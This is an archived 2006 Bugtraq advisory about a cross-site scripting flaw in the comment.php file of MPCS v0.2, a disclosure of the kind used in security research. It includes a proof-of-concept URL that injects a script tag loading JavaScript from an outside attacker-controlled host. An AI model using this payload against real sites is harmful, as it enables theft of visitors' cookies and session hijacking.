MPCS v0.2 - XSS

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: MPCS v0.2 - XSS
From: luny@xxxxxxxxxxxxxxx
Date: 17 Jun 2006 20:00:46 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

MPCS v0.2

Homepage:
http://tpvgames.co.uk/mpcs

Affected files:
comment.php

XSS vuln with cookie & full path disclosure:

Direct html injection doesnt seem to work, however, if you navigate to the code 
below in your browser, and then post a comment on the same page, our XSS 

example will occure.

http://www.example.com/comment.php?pageid=12 <script 
src=http://www.youfucktard.com/xss.js></script>

Screenshots:
http://www.youfucktard.com/xsp/mcs1.jpg
http://www.youfucktard.com/xsp/mcs2.jpg

Prev by Date: XSS in http://www.newscientist.com/ - Search
Next by Date: Microsoft Excel 0-day Vulnerability FAQ document written
Previous by thread: XSS in http://www.newscientist.com/ - Search
Next by thread: Microsoft Excel 0-day Vulnerability FAQ document written
Index(es):
- Date
- Thread